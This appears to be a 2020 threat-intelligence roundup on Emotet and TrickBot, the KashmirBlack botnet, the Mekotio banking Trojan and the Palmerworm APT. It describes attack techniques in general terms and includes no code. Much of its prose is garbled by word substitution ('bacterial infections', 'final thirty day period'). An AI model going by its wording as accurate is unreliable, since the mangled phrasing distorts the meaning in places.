Emotet & Trickbot tops the list

TrickBot and Emotet topped the record of most prolific malware strains in Oct, encouraging in the approach to push a surge in ransomware bacterial infections,

Emotet emerged as the most widespread malware final thirty day period, accounting for 12% of contaminated businesses. TrickBot and Android malware Hiddad came next, with a world-wide affect of 4% each.

Equally Emotet and TrickBot began lifetime as banking Trojans, but have advanced significantly in current decades and now function advanced modular performance to allow all the things from crytojacking and ransomware to innovative details theft.

Ever more, they’re getting made use of to provide accessibility for attackers and keep persistence in sufferer networks as a precursor to added malware downloads these types of as ransomware.

This has led to a 71% boost in ransomware attacks on US health care organizations final month vs . September, although the figures jumped 36% in EMEA and 33% in APAC.

The ransomware attacks increasing due to the fact the begin of the coronavirus pandemic, to try out and consider edge of security gaps as businesses scrambled to assistance remote workforces. These have surged alarmingly more than the earlier a few months, specially in opposition to the healthcare sector, and are pushed by pre-present TrickBot and Emotet bacterial infections.

The results chime with those of HP Inc, which discovered past 7 days that attacks utilizing the Emotet Trojan soared by more than 1200% from Q2 to the third quarter of this 12 months.

KashmirBlack ..|.. Botnet *

The highly-sophisticated botnet is believed to have infected hundreds of thousands of websites by attacking their underlying CMS platforms, according to US-based cyber security firm Imperva , named to be KashmirBlack. The main victims are Drupal, WordPress and its counts

The botnet’s prime purpose appears to infect websites, and then use their servers for cryptocurrency mining.

Hackers based on Indonesia has a base where Command&Control Infrastructure has been placed.

The botnet is the work of a hacker named “Exect1337“, a member of the Indonesian hacker crew PhantomGhost.

“The KashmirBlack C&C has three main roles: Supply a Perl script that infects the victim server with the botnet malicious script, receive reports of findings and attack results from bots and supply bots with attack instructions,” most of the victim site is from US

The KashmirBlack C&C has a scanner that searches for sites running CMS platforms, creates an attack instruction with the newly- found sites, and pushes it into a queue waiting for bots to receive them and attack.

The team found more than 20 distinct exploits.

The team advised several actions that should be performed in case your server is infected by the KashmirBlack botnet.

“Kill malicious processes, remove malicious files, remove suspicious and unfamiliar jobs and remove unused plugins and themes”.

The site administrator should ensure the CMS core files and third-party modules are always up-to-date and properly configured.

“Strong and unique passwords are recommended, as they are the first defence against brute force attacks,” .

LatAM Banking Trojan

Mekotio banking Trojan, originally known for targeting banking customers in Chile, has been expanding its scope both geographically and tactically. Mekotio is the second banking malware observed doing this within this week.

Multiple, distinct malware families have havoced Latin American Banks for years – the variants include Amavaldo, Casbaneiro, Grandoreiro, Guildma, Krachulka, Lokorrito, Mekotio, Mispadu, Numando, Vadokrist and Zumanek.

Mekotio expands across Latin America

Mekotio Trojan operators have been regularly updating their malware to cover more financial organizations across several Latin American countries, as well some new enhancements have been observed recently.

  • Researcher found several variants of Mekotio Trojan that were registered to specifically target users in Spain. Besides normal banking services, it would also targeted e-banking users from a small set of countries.
  • The malware spreads through spam emails that use social engineering tactics, like impersonating the identity of government or private agencies to lure the users into clicking on malicious links included in the message body. 
  • Mekotio can steal banking credentials stored in some web browsers such as Google Chrome and Opera. Additionally, it has been updated with the functionality of replacing the bitcoin wallet addresses copied to the clipboard by the attacker’s wallet address.

Since its first detection in March 2018, Mekotio’s developers have been making gradual improvements in this Windows-based malware, which is developed in Embarcadero Delphi.

Current coverage

As of now, Mekotio malware has a presence in Chile (having the highest detection), followed by Brazil and Mexico (medium level of detection), and then Peru, Colombia, Argentina, Ecuador, and Bolivia.

Palmerworm.. Chinese active APT.

A new espionage campaign targeting media, construction, engineering, electronics, and finance sectors in Japan, Taiwan, the U.S., and China.Linking the attacks to Palmerworm (aka BlackTech) — likely a China-based advanced persistent threat (APT) — initial traces found in 2019 . majorly a cyber espionage campaign

Among the multiple victims infected by Palmerworm, the media, electronics, and finance companies were all based in Taiwan, while an engineering company in Japan and a construction firm in China were also targeted.

A 2017 analysis by Trend Micro found the group to have orchestrated three campaigns — PLEAD, Shrouded Crossbow, and Waterbear — with an intent to steal confidential documents and the target’s intellectual property.

Stating that some of the identified malware samples matched with PLEAD, the researchers said they identified four previously undocumented backdoors (Backdoor.Consock, Backdoor.Waship, Backdoor.Dalwit, and Backdoor.Nomri),

The brand new custom malware toolset alone would have made the attribution difficult if it were not for the use of dual-use tools (such as Putty, PSExec, SNScan, and WinRAR) and stolen code-signing certificates to digitally sign its malicious payloads and thwart detection, a tactic that it has been found to employ before.

Another detail that’s noticeably not too clear is the infection vector itself, the method Palmerworm has used to gain initial access to the victim networks. The group, however, has leveraged spear-phishing emails in the past to deliver and install their backdoor, either in the form of an attachment or through links to cloud storage services.

“APT groups continue to be highly active in 2020, with their use of dual-use tools and living-off-the-land tactics making their activity ever harder to detect, and underlining the need for customers to have a comprehensive security solution in place that can detect this kind of activity,”.